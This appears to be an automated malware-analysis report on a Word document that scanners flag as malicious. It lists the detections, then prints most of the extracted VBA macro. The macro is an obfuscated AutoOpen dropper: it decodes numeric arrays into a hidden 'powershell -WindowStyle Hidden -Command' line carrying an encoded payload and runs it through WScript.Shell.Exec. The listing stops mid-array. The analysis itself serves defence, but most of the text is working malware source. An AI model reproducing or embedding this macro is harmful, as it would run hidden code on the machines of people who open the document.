MALICIOUS
288
Risk Score
Heuristics 6
-
ClamAV: Doc.Malware.Sagent-6951618-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6951618-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
CreateObject("WScript.Shell").Exec vyzwggj -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject("WScript.Shell").Exec vyzwggj -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 24362 bytes |
SHA-256: 422a97a3eb6498871c7c97f81d6426da985dfa19e23b72609a0d7b1471becfd6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function c(a)
If fyuxxg < 0 Then
b = a + 375
Else
b = a - 375
End If
iadfvfg = 8444
vhgveyy = -42305
c = Chr(b)
End Function
Sub tgyc(a, vyzwggj)
For Each x In a
If Len(x) Then
vyzwggj = vyzwggj + Replace(c(x), "tuetfg", "vaah")
End If
Next
End Sub
Sub AutoOpen()
csebdi = -49026
axtx = -65396
vixfea = -55187
vyzwggj = ""
bfibygd = Array(487, 486)
tgyc bfibygd, vyzwggj
uawf = Array(494, 476, 489, 490, 479, 476, 483, 483, 407)
tgyc uawf, vyzwggj
abcaydg = Array(420, 462, 480, 485, 475, 486, 494, 458, 491, 496, 483, 476)
tgyc abcaydg, vyzwggj
ughw = Array(407, 447, 480, 475, 475, 476, 485, 407)
tgyc ughw, vyzwggj
wdeuu = Array(420, 442, 486, 484, 484, 472, 485)
tgyc wdeuu, vyzwggj
vzbgv = Array(475)
tgyc vzbgv, vyzwggj
vtyzd = Array(407, 411, 472, 436)
tgyc vtyzd, vyzwggj
gufe = Array(414, 414, 434)
tgyc gufe, vyzwggj
jsdfjs = Array(424, 423, 428, 419, 424, 423, 425, 419, 427, 423, 419, 426)
tgyc jsdfjs, vyzwggj
bezsh = Array(425)
tgyc bezsh, vyzwggj
bsyiv = Array(419, 427, 423, 419, 427, 423)
tgyc bsyiv, vyzwggj
ewjvtu = Array(419)
tgyc ewjvtu, vyzwggj
sudubj = Array(430, 424, 419, 424)
tgyc sudubj, vyzwggj
bfehy = Array(423, 424, 419, 424, 424, 429, 419)
tgyc bfehy, vyzwggj
udiyaht = Array(427, 428, 419, 431, 428, 419, 430, 426)
tgyc udiyaht, vyzwggj
gdfy = Array(419, 429, 430, 419, 424, 424, 430, 419, 424, 423, 431, 419, 424, 424, 429)
tgyc gdfy, vyzwggj
jxvxfw = Array(419, 424, 424, 430, 419, 424, 424, 427, 419, 424, 423, 424, 419, 427)
tgyc jxvxfw, vyzwggj
tcxzu = Array(424, 419, 427, 429, 419, 430, 431, 419, 432)
tgyc tcxzu, vyzwggj
gvefgu = Array(430, 419, 424, 423)
tgyc gvefgu, vyzwggj
eyiwfhw = Array(432)
tgyc eyiwfhw, vyzwggj
ijxjwu = Array(419, 424, 423, 424, 419, 426, 425, 419)
tgyc ijxjwu, vyzwggj
hviabf = Array(427, 428, 419)
tgyc hviabf, vyzwggj
ubaiyf = Array(424, 423)
tgyc ubaiyf, vyzwggj
utby = Array(432, 419, 432, 430)
tgyc utby, vyzwggj
ehttxeb = Array(419, 424)
tgyc ehttxeb, vyzwggj
bzdv = Array(424, 429, 419, 432, 432, 419, 424, 423, 427, 419, 426)
tgyc bzdv, vyzwggj
vefw = Array(425)
tgyc vefw, vyzwggj
xcfeztb = Array(419, 426)
tgyc xcfeztb, vyzwggj
uxcv = Array(432, 419, 431, 425)
tgyc uxcv, vyzwggj
bjuwh = Array(419)
tgyc bjuwh, vyzwggj
fbhcyz = Array(431, 428)
tgyc fbhcyz, vyzwggj
gyfys = Array(419, 424, 425, 427, 419, 431, 428, 419, 429, 428, 419, 424, 425, 427, 419, 429, 429, 419, 431, 432, 419, 424, 425)
tgyc gyfys, vyzwggj
aigsje = Array(427, 419, 429, 430)
tgyc aigsje, vyzwggj
iadthaw = Array(419, 430, 431, 419, 426, 432, 419)
tgyc iadthaw, vyzwggj
bebexgf = Array(427, 424, 419, 426, 425, 419, 427, 428)
tgyc bebexgf, vyzwggj
jdxcaaj = Array(419, 424, 424)
tgyc jdxcaaj, vyzwggj
sdtwyx = Array(424, 419, 424, 424, 427, 419, 426, 425, 419, 427, 423, 419, 427, 423, 419, 430, 424)
tgyc sdtwyx, vyzwggj
whcyc = Array(419)
tgyc whcyc, vyzwggj
aayvcjv = Array(424)
tgyc aayvcjv, vyzwggj
dieexgh = Array(423, 424)
tgyc dieexgh, vyzwggj
viddta = Array(419)
tgyc viddta, vyzwggj
sfcgxdw = Array(424, 424, 429, 419, 427, 428)
tgyc sfcgxdw, vyzwggj
tzgjce = Array(419, 431, 430, 419)
tgyc tzgjce, vyzwggj
ighgvdh = Array(424, 423, 432, 419, 424, 423, 428, 419, 430, 432, 419, 432, 431, 419, 424, 423, 429)
tgyc ighgvdh, vyzwggj
hwsi = Array(419, 424, 423, 424, 419, 432, 432, 419, 424, 424, 429)
tgyc hwsi, vyzwggj
zxcci = Array(419)
tgyc zxcci, vyzwggj
hjbwb = Array(426, 425, 419, 427, 428, 419, 432, 432, 419, 424)
tgyc hjbwb, vyzwggj
vszw = Array(423, 431, 419, 432, 430, 419, 424)
tgyc vszw, vyzwggj
hjywyue = Array(424, 428, 419, 424, 424)
tgyc hjywyue, vyzwggj
cevf = Array(428, 419, 426, 425, 419, 431, 430, 419, 424, 423)
tgyc cevf, vyzwggj
eyvhybu = Array(428, 419)
tgyc eyvhybu, vyzwggj
ewtzc = Array(424, 424, 423)
tgyc ewtzc, vyzwggj
hfjhea = Array(419, 428, 424, 419, 428, 423, 419, 432, 428)
tgyc hfjhea, vyzwggj
ibby = Array(419, 429, 430, 419, 424)
tgyc ibby, vyzwggj
zice = Array(424, 424)
tgyc zice, vyzwggj
hfgi = Array(419, 424, 423, 432)
tgyc hfgi, vyzwggj
ydwhxj = Array(419, 424, 424, 425, 419, 424, 424, 430, 419, 424)
tgyc ydwhxj, vyzwggj
sdyxvz = Array(424, 429, 419, 424, 423, 424, 419)
tgyc sdyxvz, vyzwggj
csbc = Array(424, 424, 427, 419)
tgyc csbc, vyzwggj
exebaa = Array(431)
tgyc exebaa, vyzwggj
yvbs = Array(426, 419, 424, 425, 424, 419, 424, 424)
tgyc yvbs, vyzwggj
ewyt = Array(428, 419, 424, 424, 429, 419, 424, 423, 424, 419, 424, 423, 432, 419, 426, 425, 419, 427, 428)
tgyc ewyt, vyzwggj
eauzhb = Array(419, 431, 423, 419, 424)
tgyc eauzhb, vyzwggj
iayfbzx = Array(424, 427, 419, 424, 424, 424, 419)
tgyc iayfbzx, vyzwggj
vwuys = Array(424, 424, 425, 419)
tgyc vwuys, vyzwggj
ichhvzt = Array(424)
tgyc ichhvzt, vyzwggj
etga = Array(423, 424, 419, 424, 424, 427, 419)
tgyc etga, vyzwggj
hudtt = Array(424, 424)
tgyc hudtt, vyzwggj
sthwg = Array(429, 419, 424, 425, 424)
tgyc sthwg, vyzwggj
dhauv = Array(419, 426, 425, 419, 430, 430, 419, 424, 424)
tgyc dhauv, vyzwggj
hdxds = Array(424, 419, 424, 423)
tgyc hdxds, vyzwggj
eetd = Array(423, 419, 424, 423, 424, 419, 424)
tgyc eetd, vyzwggj
ugixhix = Array(423, 431, 419, 427, 424, 419, 427, 429, 419, 430, 430, 419, 424, 424)
tgyc ugixhix, vyzwggj
faytcfv = Array(424)
tgyc faytcfv, vyzwggj
tyuiev = Array(419, 424, 423, 423, 419, 424, 423, 424)
tgyc tyuiev, vyzwggj
sucefg = Array(419, 424, 423, 431, 419, 426, 425, 419)
tgyc sucefg, vyzwggj
xiaftiz = Array(427)
tgyc xiaftiz, vyzwggj
yjcz = Array(428, 419, 424, 423, 432, 419, 432, 430, 419)
tgyc yjcz, vyzwggj
hdejad = Array(424, 424, 429)
tgyc hdejad, vyzwggj
jeca = Array(419, 432)
tgyc jeca, vyzwggj
xwyv = Array(432, 419, 424)
tgyc xwyv, vyzwggj
ewtd = Array(423, 427, 419, 426)
tgyc ewtd, vyzwggj
vxgawjh = Array(425, 419, 426)
tgyc vxgawjh, vyzwggj
axbh = Array(432, 419, 431)
tgyc axbh, vyzwggj
davbdua = Array(429, 419)
tgyc davbdua, vyzwggj
hcxa = Array(424, 423, 428, 419, 424, 424, 427, 419, 424, 424, 429)
tgyc hcxa, vyzwggj
gbuvitv = Array(419)
tgyc gbuvitv, vyzwggj
gixh = Array(424, 424, 430, 419, 432, 430, 419, 424, 423, 431, 419, 429, 429, 419, 424)
tgyc gixh, vyzwggj
vcdui = Array(424, 424, 419, 424, 425, 423, 419, 424)
tgyc vcdui, vyzwggj
efghdw = Array(425, 427, 419, 431)
tgyc efghdw, vyzwggj
zucx = Array(429, 419)
tgyc zucx, vyzwggj
ttbvef = Array(430, 430, 419, 424, 424, 432, 419, 432, 430, 419, 424, 424, 427, 419, 424)
tgyc ttbvef, vyzwggj
bstcxy = Array(423, 424, 419, 424, 425, 427, 419, 430, 428, 419, 431, 429, 419, 430, 430, 419)
tgyc bstcxy, vyzwggj
gxbtxzf = Array(426, 432, 419, 427)
tgyc gxbtxzf, vyzwggj
jzzyxfy = Array(424)
tgyc jzzyxfy, vyzwggj
ubgesix = Array(419, 426, 425, 419, 427, 424, 419)
tgyc ubgesix, vyzwggj
dfjwxy = Array(424)
tgyc dfjwxy, vyzwggj
djda = Array(425, 426, 419, 426, 425, 419, 424)
tgyc djda, vyzwggj
taeeh = Array(423, 424, 419, 424)
tgyc taeeh, vyzwggj
czfjj = Array(425, 423, 419, 424, 423, 428)
tgyc czfjj, vyzwggj
dtax = Array(419)
tgyc dtax, vyzwggj
wucv = Array(424, 424, 429)
tgyc wucv, vyzwggj
afuygs = Array(419)
tgyc afuygs, vyzwggj
catgfx = Array(428, 432, 419, 426, 425, 419, 424, 425, 428)
tgyc catgfx, vyzwggj
gvxxie = Array(419, 428, 432, 419)
tgyc gvxxie, vyzwggj
gbjieid = Array(426, 429, 419, 424, 424, 429, 419, 424, 424)
tgyc gbjieid, vyzwggj
ztyz = Array(432, 419, 432, 432, 419, 432, 431, 419, 424)
tgyc ztyz, vyzwggj
wvag = Array(424, 430, 419, 424)
tgyc wvag, vyzwggj
fszsia = Array(423)
tgyc fszsia, vyzwggj
utvsi = Array(425)
tgyc utvsi, vyzwggj
jsbwg = Array(419, 426)
tgyc jsbwg, vyzwggj
huiyg = Array(425, 419, 429, 424, 419, 426, 425, 419, 432, 424)
tgyc huiyg, vyzwggj
ftyi = Array(419, 431, 426)
tgyc ftyi, vyzwggj
dvvt = Array(419, 424, 425)
tgyc dvvt, vyzwggj
zgjcuuv = Array(424)
tgyc zgjcuuv, vyzwggj
ghttjyd = Array(419, 424, 424, 428, 419, 424)
tgyc ghttjyd, vyzwggj
jvdccvj = Array(424, 429, 419, 424, 423, 424, 419, 424, 423, 432, 419, 427, 429, 419, 430, 426, 419, 430)
tgyc jvdccvj, vyzwggj
hfgv = Array(432, 419, 427, 429)
tgyc hfgv, vyzwggj
bgda = Array(419, 431, 423, 419, 432, 430, 419, 424, 424, 429)
tgyc bgda, vyzwggj
xectvw = Array(419, 424, 423, 427, 419, 432, 426, 419, 428, 431, 419, 428, 431, 419, 430, 424, 419, 424)
tgyc xectvw, vyzwggj
xabccys = Array(423)
tgyc xabccys, vyzwggj
dcavu = Array(424, 419, 424)
tgyc dcavu, vyzwggj
uectf = Array(424, 429, 419, 431, 427, 419, 424, 423, 424, 419, 424, 423, 432, 419, 424, 424, 425, 419, 431, 423, 419, 432, 430, 419, 424, 424, 429, 419)
tgyc uectf, vyzwggj
fyss = Array(424, 423, 427, 419, 427, 423, 419, 427, 424)
tgyc fyss, vyzwggj
ywybva = Array(419)
tgyc ywybva, vyzwggj
agabxj = Array(428, 432, 419, 426, 429, 419, 424, 423)
tgyc agabxj, vyzwggj
sveva = Array(428, 419, 424)
tgyc sveva, vyzwggj
tgyjbg = Array(423, 426)
tgyc tgyjbg, vyzwggj
fthgu = Array(419)
tgyc fthgu, vyzwggj
txavef = Array(424, 424, 432, 419, 424, 423)
tgyc txavef, vyzwggj
gvufujx = Array(427, 419, 424, 425, 424, 419, 424, 423, 424, 419, 426, 425, 419, 429)
tgyc gvufujx, vyzwggj
ecxbbft = Array(424)
tgyc ecxbbft, vyzwggj
aueawy = Array(419, 426)
tgyc aueawy, vyzwggj
abzs = Array(425, 419, 430)
tgyc abzs, vyzwggj
wwhi = Array(427, 419, 424, 424, 424, 419)
tgyc wwhi, vyzwggj
ijdwu = Array(424, 423)
tgyc ijdwu, vyzwggj
acgwcdy = Array(428, 419, 424, 424, 423, 419, 427, 428, 419)
tgyc acgwcdy, vyzwggj
evytisj = Array(431, 423, 419, 432, 430, 419, 424, 424, 429, 419, 424, 423, 427)
tgyc evytisj, vyzwggj
eybtbx = Array(419)
tgyc eybtbx, vyzwggj
vbfdui = Array(426, 425, 419, 426, 429)
tgyc vbfdui, vyzwggj
cstdhu = Array(419, 424, 424, 429, 419, 424, 424, 432, 419, 432, 432, 419, 432, 431, 419, 424, 424, 430, 419, 424)
tgyc cstdhu, vyzwggj
jeuifsy = Array(423, 425, 419)
tgyc jeuifsy, vyzwggj
xgivg = Array(426, 425, 419, 426, 432, 419, 429, 431, 419, 424, 423)
tgyc xgivg, vyzwggj
wjwsta = Array(430)
tgyc wjwsta, vyzwggj
fvetuf = Array(419, 424)
tgyc fvetuf, vyzwggj
eate = Array(423, 424, 419, 427)
tgyc eate, vyzwggj
gvxshv = Array(429)
tgyc gvxshv, vyzwggj
wegxde = Array(419, 424, 423)
tgyc wegxde, vyzwggj
wsai = Array(424)
tgyc wsai, vyzwggj
dwsbx = Array(419)
tgyc dwsbx, vyzwggj
ztszbu = Array(424, 425)
tgyc ztszbu, vyzwggj
ceusibt = Array(423, 419, 424, 423, 424, 419, 426, 432, 419, 428)
tgyc ceusibt, vyzwggj
hvbc = Array(432)
tgyc hvbc, vyzwggj
dcvwjib = Array(419, 426, 429, 419, 424)
tgyc dcvwjib, vyzwggj
zassv = Array(423, 426, 419, 424, 423, 425, 419, 424, 425)
tgyc zassv, vyzwggj
wgsby = Array(424, 419)
tgyc wgsby, vyzwggj
wefg = Array(432, 432)
tgyc wefg, vyzwggj
idivij = Array(419, 432, 431, 419)
tgyc idivij, vyzwggj
ejhtif = Array(424, 423, 428, 419, 426, 425, 419)
tgyc ejhtif, vyzwggj
vbjf = Array(429, 424, 419, 426, 425)
tgyc vbjf, vyzwggj
vzbd = Array(419, 426, 432)
tgyc vzbd, vyzwggj
ibvft = Array(419, 424, 423, 427)
tgyc ibvft, vyzwggj
zcxb = Array(419, 424)
tgyc zcxb, vyzwggj
vieguas = Array(424)
tgyc vieguas, vyzwggj
ctsvhu = Array(429, 419)
tgyc ctsvhu, vyzwggj
awxwwj = Array(424, 424, 429, 419, 424)
tgyc awxwwj, vyzwggj
afwwb = Array(424, 425, 419, 428)
tgyc afwwb, vyzwggj
zfhcshw = Array(431, 419, 427, 430, 419, 427)
tgyc zfhcshw, vyzwggj
fatugfu = Array(430, 419)
tgyc fatugfu, vyzwggj
xyahigg = Array(424, 424, 432)
tgyc xyahigg, vyzwggj
hhwvewz = Array(419, 424, 424, 432)
tgyc hhwvewz, vyzwggj
jtxdbgf = Array(419)
tgyc jtxdbgf, vyzwggj
haes = Array(424)
tgyc haes, vyzwggj
ziey = Array(424, 428, 419, 427, 429, 419, 424, 423, 424, 419, 424, 423, 432, 419, 424, 423, 424, 419, 424, 424, 427, 419)
tgyc ziey, vyzwggj
xhsestj = Array(432, 430, 419, 424, 423, 431, 419, 424, 423, 423, 419, 424, 424, 428, 419, 424, 424)
tgyc xhsestj, vyzwggj
ztxh = Array(430, 419, 424, 424)
tgyc ztxh, vyzwggj
vwds = Array(427, 419, 424, 423, 425)
tgyc vwds, vyzwggj
txwbd = Array(419, 424, 424, 428, 419)
tgyc txwbd, vyzwggj
yuwf = Array(432, 432, 419, 424, 423, 428, 419, 424, 423, 424)
tgyc yuwf, vyzwggj
xvvwfsu = Array(419, 424)
tgyc xvvwfsu, vyzwggj
ssas = Array(424, 423)
tgyc ssas, vyzwggj
vsiti = Array(419, 432, 432, 419, 424, 423)
tgyc vsiti, vyzwggj
bwca = Array(424, 419, 424, 424, 428, 419, 427)
tgyc bwca, vyzwggj
zuau = Array(429, 419)
tgyc zuau, vyzwggj
byhdf = Array(424)
tgyc byhdf, vyzwggj
dutte = Array(424)
tgyc dutte, vyzwggj
ugjxs = Array(424, 419, 424, 424, 427, 419, 424, 423, 426, 419)
tgyc ugjxs, vyzwggj
cifzdzs = Array(427)
tgyc cifzdzs, vyzwggj
bcwha = Array(430, 419, 432, 430, 419, 424, 424)
tgyc bcwha, vyzwggj
iwvc = Array(425, 419, 424, 423, 428, 419, 429, 426, 419, 424, 424)
tgyc iwvc, vyzwggj
htthf = Array(428, 419, 424, 425, 423, 419, 424, 423, 428, 419, 424, 423, 424, 419, 424, 425, 423, 419, 426, 432, 419, 428, 432, 419, 426, 429, 419, 424, 423)
tgyc htthf, vyzwggj
cbgey = Array(424)
tgyc cbgey, vyzwggj
xeuej = Array(419, 424, 423, 427, 419, 424, 423, 423, 419)
tgyc xeuej, vyzwggj
dwthxfy = Array(424, 424, 432)
tgyc dwthxfy, vyzwggj
edysw = Array(419, 426, 425, 419, 429, 424, 419, 426, 425, 419, 430)
tgyc edysw, vyzwggj
gzgce = Array(427, 419, 424, 424, 424, 419, 424, 423)
tgyc gzgce, vyzwggj
fscxh = Array(428, 419, 424)
tgyc fscxh, vyzwggj
dssvbj = Array(424, 423, 419, 427, 428, 419, 431, 423, 419, 432, 430, 419, 424)
tgyc dssvbj, vyzwggj
gaibcat = Array(424, 429)
tgyc gaibcat, vyzwggj
dawg = Array(419, 424, 423)
tgyc dawg, vyzwggj
sibw = Array(427, 419, 426, 425, 419, 426, 429, 419, 424)
tgyc sibw, vyzwggj
ijti = Array(424, 429, 419, 424, 424, 432, 419, 432, 432, 419, 432, 431, 419, 424, 424, 430, 419, 424, 423, 425, 419)
tgyc ijti, vyzwggj
gfyfb = Array(426)
tgyc gfyfb, vyzwggj
vuzus = Array(425, 419, 426, 432, 419, 431, 426, 419, 424, 423, 424, 419, 432, 430, 419, 424, 424)
tgyc vuzus, vyzwggj
vzheyde = Array(427, 419)
tgyc vzheyde, vyzwggj
uzwzca = Array(432, 432, 419, 424, 423)
tgyc uzwzca, vyzwggj
gicfwuz = Array(427, 419)
tgyc gicfwuz, vyzwggj
titiub = Array(430, 426, 419, 428, 424, 419)
tgyc titiub, vyzwggj
iyuy = Array(428, 423, 419, 427, 429, 419)
tgyc iyuy, vyzwggj
utit = Array(424, 423, 429, 419, 424, 424, 428, 419, 426, 432, 419, 428, 432)
tgyc utit, vyzwggj
hjtzgva = Array(419, 426, 429, 419, 424, 424, 432, 419)
tgyc hjtzgva, vyzwggj
hevcidw = Array(432, 431, 419)
tgyc hevcidw, vyzwggj
bhhbg = Array(424, 424, 429, 419, 424, 425, 423)
tgyc bhhbg, vyzwggj
xtgfsyy = Array(419, 424, 425, 423, 419, 424, 424)
tgyc xtgfsyy, vyzwggj
axhzeht = Array(430, 419, 426, 425, 419, 429, 424, 419, 426)
tgyc axhzeht, vyzwggj
axtjg = Array(425, 419, 426)
tgyc axtjg, vyzwggj
xffj = Array(432, 419)
tgyc xffj, vyzwggj
xesxb = Array(424, 423, 427, 419, 424, 424, 429, 419, 424, 424, 429, 419, 424, 424, 425, 419, 428)
tgyc xesxb, vyzwggj
uzicfc = Array(431, 419, 427, 430, 419, 427, 430)
tgyc uzicfc, vyzwggj
wdefa = Array(419, 424, 423, 428, 419, 424, 423)
tgyc wdefa, vyzwggj
syushh = Array(432, 419, 424, 423, 426, 419, 427)
tgyc syushh, vyzwggj
sjabie = Array(429, 419, 424)
tgyc sjabie, vyzwggj
wuvasb = Array(423, 424)
tgyc wuvasb, vyzwggj
davi = Array(419, 424, 424, 428, 419, 424, 424, 428, 419, 427, 428, 419, 424, 423)
tgyc davi, vyzwggj
dujvxb = Array(428, 419, 424, 423, 423, 419)
tgyc dujvxb, vyzwggj
gzftsx = Array(427, 429, 419, 432, 432)
tgyc gzftsx, vyzwggj
jhuaix = Array(419, 424, 424, 424, 419, 424)
tgyc jhuaix, vyzwggj
jhaii = Array(423, 432, 419)
tgyc jhaii, vyzwggj
yzdgauw = Array(427, 430, 419, 424, 423, 431)
tgyc yzdgauw, vyzwggj
udstt = Array(419, 428)
tgyc udstt, vyzwggj
hsayb = Array(423, 419, 427, 429, 419, 424)
tgyc hsayb, vyzwggj
heitxbc = Array(424, 425, 419, 424, 423, 427, 419, 424, 424, 425, 419)
tgyc heitxbc, vyzwggj
fzvyx = Array(429, 426, 419, 424, 424, 431, 419, 424, 423, 428, 419, 424, 423, 423)
tgyc fzvyx, vyzwggj
zziji = Array(419, 429, 424, 419, 424, 425, 425)
tgyc zziji, vyzwggj
zeivzjf = Array(419)
tgyc zeivzjf, vyzwggj
fysvfs = Array(432, 430, 419)
tgyc fysvfs, vyzwggj
gbbsgz = Array(424, 424, 429, 419, 427)
tgyc gbbsgz, vyzwggj
ajad = Array(432, 419, 426, 432, 419)
tgyc ajad, vyzwggj
efasfha = Array(428, 432)
tgyc efasfha, vyzwggj
txji = Array(419, 424, 424, 429)
tgyc txji, vyzwggj
jyvfjew = Array(419, 424)
tgyc jyvfjew, vyzwggj
hvbzst = Array(424)
tgyc hvbzst, vyzwggj
zwsd = Array(427, 419, 424, 425, 424, 419, 424, 425, 426, 419, 427, 423, 419, 430, 431, 419, 424)
tgyc zwsd, vyzwggj
iwfhj = Array(423, 424, 419, 424, 424, 432, 419, 427, 428)
tgyc iwfhj, vyzwggj
fexciu = Array(419, 430, 432, 419, 432, 431, 419, 424, 423, 429)
tgyc fexciu, vyzwggj
txehbff = Array(419, 424, 423, 424, 419, 432)
tgyc txehbff, vyzwggj
sayjjez = Array(432)
tgyc sayjjez, vyzwggj
gwatg = Array(419, 424)
tgyc gwatg, vyzwggj
vuewc = Array(424, 429, 419, 426, 425, 419, 430)
tgyc vuewc, vyzwggj
ujut = Array(431, 419, 424, 423)
tgyc ujut, vyzwggj
sgdfy = Array(424)
tgyc sgdfy, vyzwggj
fgzy = Array(419, 424)
tgyc fgzy, vyzwggj
jbgxdzy = Array(424, 429)
tgyc jbgxdzy, vyzwggj
awzvfh = Array(419)
tgyc awzvfh, vyzwggj
gxiwzc = Array(427, 429, 419, 431, 430, 419, 424, 423, 424, 419, 432, 431, 419, 429, 430, 419, 424, 423, 431, 419, 424, 423, 428)
tgyc gxiwzc, vyzwggj
zawjtdg = Array(419, 424, 423, 424, 419, 424, 424, 423, 419, 424, 424, 429, 419, 427, 424)
tgyc zawjtdg, vyzwggj
hiiyic = Array(419, 427, 429, 419, 429, 431, 419, 424)
tgyc hiiyic, vyzwggj
yffd = Array(424, 424, 419, 424, 424, 432, 419, 424, 424, 423, 419, 424, 423, 431, 419, 424)
tgyc yffd, vyzwggj
uwigvx = Array(424, 424, 419, 432)
tgyc uwigvx, vyzwggj
gugz = Array(430)
tgyc gugz, vyzwggj
gcctv = Array(419, 424, 423)
tgyc gcctv, vyzwggj
cuxjgtg = Array(423, 419, 430, 423, 419, 424, 423)
tgyc cuxjgtg, vyzwggj
eehxcb = Array(428, 419)
tgyc eehxcb, vyzwggj
zufhz = Array(424)
tgyc zufhz, vyzwggj
eyufvze = Array(423, 431, 419)
tgyc eyufvze, vyzwggj
ucctex = Array(424, 423, 424, 419, 427, 423, 419)
tgyc ucctex, vyzwggj
cjzusd = Array(426, 429, 419, 424, 424, 432, 419, 432)
tgyc cjzusd, vyzwggj
zbfdf = Array(431)
tgyc zbfdf, vyzwggj
gfyjxcy = Array(419)
tgyc gfyjxcy, vyzwggj
jctdeg = Array(424, 424, 429, 419)
tgyc jctdeg, vyzwggj
bezwsh = Array(424, 425, 423, 419, 424, 425, 423, 419, 424, 424, 430, 419)
tgyc bezwsh, vyzwggj
xchch = Array(427, 427, 419, 426, 429, 419, 424, 423, 424, 419)
tgyc xchch, vyzwggj
heyvx = Array(424, 423, 427, 419, 424, 423, 423, 419, 424, 424, 432, 419, 427, 424, 419, 428, 432)
tgyc heyvx, vyzwggj
tehjhwt = Array(419, 431)
tgyc tehjhwt, vyzwggj
dawtchh = Array(426, 419, 424, 424, 429, 419, 432, 430, 419)
tgyc dawtchh, vyzwggj
zxaxhh = Array(424, 424, 427, 419, 424, 424, 429)
tgyc zxaxhh, vyzwggj
bxzy = Array(419, 427, 428, 419, 431, 423, 419, 424, 424, 427, 419, 424, 424, 424)
tgyc bxzy, vyzwggj
tyavtx = Array(419, 432)
tgyc tyavtx, vyzwggj
veexzd = Array(432, 419, 424)
tgyc veexzd, vyzwggj
iyietx = Array(423, 424, 419, 424, 424, 428, 419, 424)
tgyc iyietx, vyzwggj
dsudxf = Array(424, 428, 419)
tgyc dsudxf, vyzwggj
jygu = Array(426, 425)
tgyc jygu, vyzwggj
cbvxbaj = Array(419)
tgyc cbvxbaj, vyzwggj
wusa = Array(426)
tgyc wusa, vyzwggj
cfaxu = Array(429, 419)
tgyc cfaxu, vyzwggj
cszsscc = Array(424, 423, 424)
tgyc cszsscc, vyzwggj
xfdv = Array(419, 424, 423, 427, 419, 424, 423, 423, 419)
tgyc xfdv, vyzwggj
zzwsyia = Array(424, 424, 432, 419)
tgyc zzwsyia, vyzwggj
xjach = Array(428, 432, 419, 424, 425, 428)
tgyc xjach, vyzwggj
uvvby = Array(419)
tgyc uvvby, vyzwggj
dtyyw = Array(432, 432, 419, 432, 430, 419, 424, 424, 429, 419, 432)
tgyc dtyyw, vyzwggj
whebyzj = Array(432, 419, 424)
tgyc whebyzj, vyzwggj
sidgwes = Array(423)
tgyc sidgwes, vyzwggj
bhzbtf = Array(427, 419, 424)
tgyc bhzbtf, vyzwggj
wsavy = Array(425, 426, 419, 424, 425, 428)
tgyc wsavy, vyzwggj
zzdgcxc = Array(419, 428, 432, 419, 424, 424, 429, 419)
tgyc zzdgcxc, vyzwggj
bizgv = Array(424, 424, 427, 419, 424)
tgyc bizgv, vyzwggj
vyxgjj = Array(425)
tgyc vyxgjj, vyzwggj
xduszev = Array(424, 419, 424, 425, 426, 419, 427)
tgyc xduszev, vyzwggj
udjsx = Array(423, 419, 430, 431, 419, 424, 423, 424, 419, 424, 424)
tgyc udjsx, vyzwggj
utui = Array(432, 419, 427, 428, 419)
tgyc utui, vyzwggj
abyy = Array(430, 432)
tgyc abyy, vyzwggj
vubfjti = Array(419, 432)
tgyc vubfjti, vyzwggj
gzuy = Array(431, 419, 424, 423, 429, 419, 424, 423, 424)
tgyc gzuy, vyzwggj
ustged = Array(419, 432, 432)
tgyc ustged, vyzwggj
wyghe = Array(419)
tgyc wyghe, vyzwggj
czjy = Array(424, 424, 429, 419)
tgyc czjy, vyzwggj
uuecy = Array(426, 425, 419, 430, 431, 419)
tgyc uuecy, vyzwggj
ezfatz = Array(424, 423, 424)
tgyc ezfatz, vyzwggj
jxdsfh = Array(419, 424)
tgyc jxdsfh, vyzwggj
igcw = Array(424, 429, 419, 427, 429, 419, 431, 430, 419, 424, 423, 424, 419, 432, 431, 419, 429, 430, 419, 424, 423, 431, 419, 424, 423, 428, 419, 424, 423)
tgyc igcw, vyzwggj
xxuewh = Array(424, 419, 424, 424, 423, 419, 424, 424, 429, 419, 427, 424, 419, 427, 429, 419, 429, 431, 419, 424, 424, 424, 419, 424, 424, 432)
tgyc xxuewh, vyzwggj
hwgdtu = Array(419)
tgyc hwgdtu, vyzwggj
gcgyf = Array(424, 424)
tgyc gcgyf, vyzwggj
zhbjas = Array(423, 419, 424, 423, 431, 419, 424, 424, 424)
tgyc zhbjas, vyzwggj
iueuthc = Array(419, 432, 430, 419, 424, 423, 423, 419)
tgyc iueuthc, vyzwggj
yhdajxy = Array(430, 423, 419, 424, 423, 428, 419, 424, 423, 431, 419, 424)
tgyc yhdajxy, vyzwggj
cscybb = Array(423, 424, 419, 427, 423, 419, 426, 429, 419, 424, 423)
tgyc cscybb, vyzwggj
udtasx = Array(426, 419, 424, 423, 425, 419, 424, 425, 424, 419, 432, 432, 419, 432, 431, 419, 424)
tgyc udtasx, vyzwggj
tvwaau = Array(423, 428, 419, 427, 427, 419, 426, 429, 419, 424, 423, 428)
tgyc tvwaau, vyzwggj
eixdt = Array(419, 424, 423, 426)
tgyc eixdt, vyzwggj
ytvtjg = Array(419, 424, 424, 432, 419, 424, 423, 427)
tgyc ytvtjg, vyzwggj
xgvjaa = Array(419, 424, 425, 424, 419, 424)
tgyc xgvjaa, vyzwggj
cbtsb = Array(423, 424, 419, 427)
tgyc cbtsb, vyzwggj
jwjs = Array(424, 419, 428, 432)
tgyc jwjs, vyzwggj
uttfxw = Array(419, 431)
tgyc uttfxw, vyzwggj
xzjtj = Array(426)
